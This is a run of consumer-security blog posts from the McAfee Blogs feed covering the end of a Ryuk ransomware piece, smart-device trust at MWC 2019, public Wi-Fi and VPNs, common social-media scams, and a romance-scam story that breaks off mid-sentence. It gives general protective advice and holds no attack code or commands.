In the last seven months Ryuk has proven to be a highly profitable form of ransomware, despite the poor programming behind it and its decryptor. The criminals have proven to be ruthless and several of their victims were forced to wind down their businesses after they were unable to afford the exorbitant ransom.

When a company does give in to the high demands it is extra painful to see a situation occur where they are permanently unable to recover their files due to the faulty decryptor.

A solid data loss prevention strategy still remains the best advice against all forms of ransomware, for general prevention advice please visit NoMoreRansom. Always seek professional assistance when you are faced with a targeted ransomware attack such as Ryuk.

The post Ryuk, Exploring the Human Connection appeared first on McAfee Blogs.

MWC 2019: The Key to Establishing Digital Trust with Intelligent Connectivity

These days, it’s rare to walk into a home that doesn’t have a smart device in use. From voice assistants, smart TVs, tablets, and more, these devices have greatly enhanced our way of life through intelligent connectivity. Intelligent connectivity is defined by the highly contextualized and personal experiences offered by the smart devices we utilize on a daily basis. However, as manufacturers continue to push out the latest technology to stay ahead of their competitors, device security isn’t always top-of-mind. As a result, the level of confidence consumers have in their devices is reduced. At McAfee, we understand that the notion of digital trust is imperative to the future of security as we adopt technologies shaped by the likes of 5G networks, the Internet of Things (IoT), artificial intelligence (AI), and big data. And as we head into Mobile World Congress 2019 (MWC), one can’t help but wonder, how will these advancements shape the future of mobile connectivity?

Almost every new device is built to connect, and as our 2019 Threats Predictions Report showed us, our dependence on technology is ubiquitous. Take your smartphone, for example. Everywhere you go, this minicomputer allows you to chat with your friends online, send emails, and look up new information with just the press of a button. Only upping the ante, 5G is set to roll out across the nation, bringing greater speed to handheld devices with more data and lower latency. These benefits will set the stage for more IoT devices, such as your smart refrigerator or smart plug, to connect to the network as well. The ability to control the temperature of your refrigerator from your smartphone is a pretty cool capability. But what happens if your smartphone gets hacked and a cybercriminal remotely disables your refrigerator? You may be left with a bigger problem than some spoiled food.

With all of your smart devices on the same 5G network, malicious actors can gain full access to the data that lives in your smart home technology through just your mobile phone. The increase in devices on the 5G network also increases the risk of Distributed Denial-of-service, or DDoS, attacks. These attacks are caused by cybercriminals flooding a network with so much traffic that it can’t operate or communicate as it normally would. And with more IoT devices operating on the 5G network, the consequences of such a cyberattack could be truly crippling. So, how can we continue to trust the devices we use on a daily basis despite the cybersecurity risks caused by greater connectivity?

Digital trust, or the level of confidence consumers have in their technology and mobile devices, is extremely delicate. And as our experiences with our devices become more and more personalized thanks to intelligent connectivity, it’s important to realize that it can’t be intelligent if there is no trust. That’s why consumers should embrace advancements in mobile technology but remember to keep cybersecurity practices at the forefront.

Whether you’re headed out to Barcelona for MWC 2019 or watching from afar, we here at McAfee are committed to helping you take the necessary precautions required in order to connect with confidence in a world where everything is built to connect.

Stay on top of the latest consumer and mobile security threats by following @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post MWC 2019: The Key to Establishing Digital Trust with Intelligent Connectivity appeared first on McAfee Blogs.

The Risks of Public Wi-Fi and How to Close the Security Gap

public wi-fi risksAs I write this blog post, I’m digitally exposed, and I know it. For the past week, I’ve had to log on to a hospital’s public Wi-Fi each day to work while a loved one recuperates.

What seems like a routine, casual connection to the hospital’s Wi-Fi isn’t. Using public Wi-Fi is a daily choice loaded with risk. Sure, I’m conducting business and knocking out my to-do list like a rock star but at what cost to my security?

The Risks

By using public Wi-Fi, I’ve opened my online activity and personal data (via my laptop) up to a variety of threats including eavesdropping, malware distribution, and bitcoin mining. There’s even a chance I could have logged on to a malicious hotspot that looked like the hospital network.

Like many public Wi-Fi spots, the hospital’s network could lack encryption, which is a security measure that scrambles the information sent from my computer to the hospital’s router so other people can’t read it. Minus encryption, whatever I send over the hospital’s network could potentially be intercepted and used maliciously by cybercriminals.

Because logging on to public Wi-Fi is often a necessity — like my situation this week — security isn’t always the first thing on our minds. But over the past year, a new normal is emerging. A lot of us are thinking twice. With data breaches, privacy concerns, the increase in the market for stolen credentials, and increasingly sophisticated online scams making the headlines every day, the risks of using public Wi-Fi are front and center.

Rising Star: VPNpublic wi-fi risks

The solution to risky public Wi-Fi? A Virtual Private Network (VPN). A VPN allows users to securely access a private network and share data remotely through public networks. Much like a firewall protects the data on your computer, a VPN protects your online activity by encrypting your data when you connect to the internet from a remote or public location. A VPN also conceals your location, IP address, and online activity.

Using a VPN helps protect you from potential hackers using public Wi-Fi, which is one of their favorite easy-to-access security loopholes.

Who Needs a VPN?

If you (or your family members) travel and love to shop online, access your bank account, watch movies, and do everyday business via your phone or laptop, a VPN would allow you to connect safely and encrypt your data no matter where you are.

A VPN can mask, or scramble, your physical location, banking account credentials, and credit card information.

Also, if you have a family data plan you’ve likely encouraged your kids to save data by connecting to public Wi-Fi whenever possible. Using a VPN, this habit would be secured from criminal sniffers and snoopers.

A VPN allows you to connect to a proxy server that will access online sites on your behalf and enables a secure connection most anywhere you go. A VPN also allows hides your IP address and allows you to browse anonymously from any location.

How VPNs work

To use a VPN you subscribe to VPN service, download the app onto your desktop or phone, set up your account, and then log onto a VPN server to conduct your online activity privately.

If you are still logging on to public Wi-Fi, here are a few tips to keep you safe until VPNs become as popular as Wi-Fi.

Stay Safe on Public Wi-Fi 

Verify your connection. Fake networks that mine your data abound. If you are logging on to Wi-Fi in a coffee shop, hotel, airport, or library, verify the exact name of the network with an employee. Also, only use Wi-Fi that requires a password to log on.public wi-fi risks

Don’t get distracted. For adults, as well as kids, it’s easy to get distracted and absorbed with our screens — this is risky when on public Wi-Fi, according to Diana Graber, author of Raising Humans in a Digital World. “Knowing how to guard their personal information online is one of the most important skills parents need to equip their young kids with today,” says Graber. “Lots of young people visit public spaces, like a local coffee shop or library, and use public Wi-Fi to do homework, for example. It’s not uncommon for them to get distracted by something else online or even tempted to buy something, without realizing their personal information (or yours!) might be at risk.”

Disable auto Wi-Fi connect. If your phone automatically joins surrounding networks, you can disable this function in your settings. Avoid linking to unknown or unrecognized networks.

Turn off Wi-Fi when done. Your computer or phone can still transmit data even when you are not using it. Be sure to disable your Wi-Fi from the network when you are finished using it.

Avoid financial transactions. If you must use public Wi-Fi, don’t conduct a sensitive transaction such as banking, shopping, or any kind of activity that requires your social security or credit card numbers or password use. Wait until you get to a secured home network to conduct personal business.

Look for the HTTPS. Fake or unsecured websites will not have the HTTPS in their address. Also, look for the little lock icon in the address bar to confirm a secure connection.

Secure your devices. Use a personal VPN as an extra layer of security against hackers and malware.

The post The Risks of Public Wi-Fi and How to Close the Security Gap appeared first on McAfee Blogs.

How To Sidestep Popular Social Scams

Each year, internet users lose billions of dollars to online scams, using clever ploys to trick us out of our information and money. By offering prizes, referencing current events, or just creating a sense of urgency, scammers know how to get us to click when we really shouldn’t. Check out these recent scams, so you know what to look out for.

Nosy Quizzes & Questionnaires

Quizzes circulating on Facebook, Twitter, and other social platforms may look like a fun way to win free stuff, but often they are phishing attacks in disguise. Many appear to be sponsored by big-name brands such as airlines and major retailers, offering free products or discount tickets if you just answer a few questions. The questions are designed to get you to reveal personal information that can be used to guess your passwords or security questions, such as your mother’s maiden name, or your hometown.

Creepy Crypto Scams 

While cryptocurrencies lost a lot of value over the last year, the same cannot be said for cryptocurrency scams. The majority of them center on distributing crypto mining malware, which allows hackers to access a person’s computer or device without their permission in order to mine for cryptocurrencies. In fact, these scams have been so prolific that at the end of 2018 McAfee reported that coin mining malware had grown more than 4000% in the previous year.

Many of these miners were distributed through phishing emails and websites, using “giveaway” scams on social media, or even via crypto mining chat groups on platforms such as Slack. Cybercrooks enter the chat rooms, pretending to be fellow miners, and encourage users to download malware disguised as “fixes” to crypto issues.

Romance & “Sextortion” Scams 

The meteoric rise of online dating has led to a similar increase in romance scams. These often involve bad actors preying on lonely people who are looking to connect. Scammers build up a sense of trust over online dating and social media platforms, before asking for money. They often claim the money is for an emergency, or a plane ticket to visit. This kind of manipulation works so well that the Better Business Bureau estimates that victims in the U.S. and Canada lost nearly $1 billion to romance scams between 2015 and 2018.

And while romance is one way to manipulate users, another driver is fear. This is certainly the case with the recent rise in so-called “sextortion” scams, which scare users into paying money to prevent incriminating pictures or videos of them from getting out. The bad guys claim that they obtained the embarrassing content by infecting the victim’s device with malware, and often send part of an old, leaked password as proof that they could have accessed their account.

Topical News Hooks

Whenever a major story sweeps the news, chances are the scammers are looking for ways to capitalize on it. This is exactly what happened during the recent U.S. government shutdown, which left 800,000 federal employees out of work for over a month. Since many of these workers were looking for extra income, job scams abounded. Some phony job ads asked workers to fill out detailed job application forms, in order to steal their Social Security numbers and other private information.

In another ruse, scammers sent out phony emails that appeared to be from the IRS, saying that the recipient could get a discount on their tax bills if they paid during the shutdown.

Tried-and-True Scams

Package Delivery— Phony package delivery emails usually spike around the holidays, but in the age of Amazon Prime delivery scams are circulating year-round. Be on the lookout for more recent Amazon scams that come in the form of a phishing email, asking you to review a product to get rewards. If you click on the link it could deliver malware, or even ransomware.

Tech Support— This is one of the oldest, but most persistent scams to date. Phishing websites and phony pop-up warnings that a computer or device is infected have led thousands of people to hand over personal and financial information to fix a problem they don’t really have.

Even though consumers have become savvier about these scams, a recent Microsoft survey found that 3 out of 5 people have been exposed to tech support scams over the last year.

So, now that you know what to look out for, here are our top tips for sidestepping the scammers:

  • Be careful where you click—Don’t open suspicious links and attachments, and never click on pop-up messages from an unknown source. If you get a suspicious login or payment request, go directly to the provider’s official website to see if the request is legitimate.
  • Know how to spot the fake—Phony messages or documents will often look like a simplified version of the real thing, with poor quality graphics, incorrect grammar and spelling, and a generic personal greeting.
  • Keep your personal information private—Avoid online quizzes, and never share personal or financial details with someone you don’t know in real life. Review your privacy and security settings on social sites to make sure that you aren’t leaking information.
  • Be a smart online shopper—Only buy from reputable websites, and steer away from deals that seem too good to be true. Be suspicious of unusual payment requests, such as buying gift cards or using virtual currency.
  • Become a password pro—Choose complex and unique passwords for all of your accounts. Consider using a password manager to help you create and store complicated passwords securely.
  • Protect your computers and devices—Use comprehensive security software that can safeguard you from the latest threats.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post How To Sidestep Popular Social Scams appeared first on McAfee Blogs.

Valentine’s Alert: Don’t Let Scammers Break Your Heart or Your Bank Account

Online Dating ScamsIt’s hard to believe that as savvy as we’ve become about our tech, people are still getting catfished, scammed, and heartbroken in their pursuit of love online.

The dinner conversation between bystanders goes something like this: “How could anyone be so dumb? Seriously? If they are going to be that reckless and uninformed, then maybe they deserve what they got!”

Some friends and I recently had a similar conversation about online dating scams. I noticed, however, that one friend, Sarah*, wasn’t so eager to jump into the conversation. She shrunk back in the booth and quietly sipped her margarita. Only later did she share her story with me.

The power of love

A single mom in her late 40s, well-educated, and attractive, Sarah’s teenager had convinced her to join a dating site the year before. She was especially lonely after her divorce three years earlier, so she agreed to create a profile on a popular dating app. After a handful of dates fell flat, she found Scott. He was charismatic, kind. “We had an instant connection,” according to Sarah. They spent hours on the phone sharing their deepest secrets and even started imagining a future together. But after about three months, Scott fell on hard times. At first, he needed to borrow $400 to pay for airfare to visit a dying relative, which he paid back immediately. Over the next few months, the numbers grew to $1,000 for rent and $3,000 for a business venture.

Online Dating Scams

Before long, Sarah had loaned her new love over $8,500. When she pressed him to repay the money, Scott ghosted Sarah online, moved out of town, and she never saw him again. My friend didn’t share her story with many people. She didn’t report it. She was too embarrassed and humiliated and even became depressed following what she calls “the Scott scam.” Her trust in other people and in love itself has been obliterated.

Sarah’s story doesn’t just echo that of desperate, clueless people, or lonely older women. Scammers are targeting good people who still believe in and value love and companionship. The pursuit of love online extends to adults as well as teens.

Confidence Fraud

Law enforcement calls these kinds of online romance scams confidence fraud because scammers will take a considerable amount of time gaining the trust and confidence of their victims. They will appear empathetic and supportive as they gather personal i